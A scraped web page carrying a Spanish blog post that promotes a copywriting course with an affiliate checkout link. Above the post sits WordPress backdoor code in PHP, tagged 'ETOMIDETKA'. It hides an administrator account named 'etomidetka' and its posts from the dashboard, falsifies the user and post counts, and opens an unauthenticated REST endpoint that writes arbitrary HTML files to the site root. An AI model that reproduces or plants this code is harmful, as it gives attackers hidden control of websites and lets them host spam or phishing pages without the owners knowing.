//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } Copywriting mensajes que venden - Amazonas Digital
Marketing Digital Tecnología

Copywriting mensajes que venden

Escribir bien, puede llegar a marcar esa línea delgada que separa el éxito y el fracaso de tu estrategia, pero la mayoría de la gente no lo sabe. En este programa podrás conocer y aprender todo sobre el mundo de la escritura persuasiva, la cual ha llevado a emprendedores y empresas a producir una comunicación contundente y eficaz  gracias al poder de las palabras. 

A través de este programa lograrás:

  • Detectar las necesidades de tus clientes con la técnica del “PAINSTORMING” 
  • Crear un encabezado en 5 minutos para capturar la atención de tu público objetivo.
  • Implementar técnicas y fórmulas para crear ofertas irresistibles y que así se interesen en tu producto.
  • Despertar la curiosidad con una estructura de 10 claves psicológicas y así mismo conectar a tus clientes.
  • Segmentar y comunicarte específicamente con tu mercado objetivo.
  • Redactar correos persuasivos por medio la formula sentir, saber y hacer inspirada en ALEXANDRA FRANZEN.
  • Aplicar estructuras irresistibles de 7 pasos  para que tus clientes te amen con un mensaje persuasivo.
  • El COPYWRITING de grandes marcas.
  • 5 Ejemplos efectivos de COPYWRITING para vender.
  • CALL 2 ACTION / Llamado a la acción para atraer clientes potenciales y provocar ventas.

Si quieres conocer más entra a: https://pay.hotmart.com/T23474751K?checkoutMode=10&ref=T25470638T&bid=1622067775117

 

Editado por: Esperanza Herrera / Laura López
Contenidos Digitales IMK

________________________________

Fuente: https://pay.hotmart.com/T23474751K?checkoutMode=10&ref=T25470638T&bid=1622067775117

Email: coach@ingenierosdemarketing.com.co

www.ingenierosdemarketing.com.co

www.JulianCastiblanco.com

Diseño hecho en CANVA

 

Otros artículos que te pueden interesar:

Acciones Vs Canales Digitales ¿Quién genera los resultados comerciales?

About the author

Ingenierosdemarketing

Leave a Comment